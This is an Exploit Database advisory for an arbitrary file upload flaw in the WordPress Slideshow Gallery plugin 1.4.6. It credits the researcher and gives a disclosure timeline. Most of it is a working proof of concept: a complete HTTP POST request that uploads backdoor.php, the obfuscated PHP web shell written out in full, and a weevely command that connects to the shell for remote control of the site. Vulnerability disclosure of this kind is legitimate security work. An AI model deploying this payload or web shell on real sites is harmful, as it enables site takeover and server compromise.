WordPress Plugin Slideshow Gallery 1.4.6 – Arbitrary File Upload

• Exploit Database
• 32 阅读

• 作者： Jesus Ramirez Pichardo
  日期： 2014-09-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34514/

• Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability. 
  Found by: Jesus Ramirez Pichardo
  @whitexploit
  http://whitexploit.blogspot.mx/
  Date: 2014-08-28
  Vendor Homepage: http://tribulant.com/
  Software: Slideshow Gallery
  Version: 1.4.6
  Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip 
  Tested on: Windows 7 OS, WordPress 3.9.2 and Chrome Browser.
  
  Description:
  
  I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.
  
  Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
  
  Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).
  
  Proof of Concept (PoC):
  
  1. An attacker uploads a PHP shell file (i.e. backdoor.php):
  
  POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
  Host: 192.168.31.128
  Connection: keep-alive
  Content-Length: 2168
  Cache-Control: max-age=0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
  Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
  Accept-Encoding: gzip,deflate
  Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
  Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="Slide[id]"
  
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[order]"
  
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[title]"
  
  Test Shell Upload 
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[description]"
  
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[showinfo]"
  
  both
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[iopacity]"
  
  70
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[galleries][]"
  
  1
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="Slide[type]"
  
  file
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="image_file"; filename="backdoor.php" 
  Content-Type: application/octet-stream
  
  <?php
  $kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
  $uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
  $qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
  $rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
  ?>
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="Slide[image_url]"
  
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="Slide[uselink]"
  
  N
  
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="Slide[link]"
  
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
  Content-Disposition: form-data; name="Slide[linktarget]"
  
  self
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV
  Content-Disposition: form-data; name="submit"
  
  Save Slide
  ------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
  
  2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
  
  3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
  
  #weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit
  
  Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
  vulnerable website.
  
  Vulnerability Disclosure Timeline:
  2014-08-28: Discovered vulnerability
  2014-08-29: Vendor Notification (support@tribulant.com) 
  2014-08-29: Vendor Response/Feedback
  2014-08-29: Vendor Fix/Patch
  2014-08-30: Public Disclosure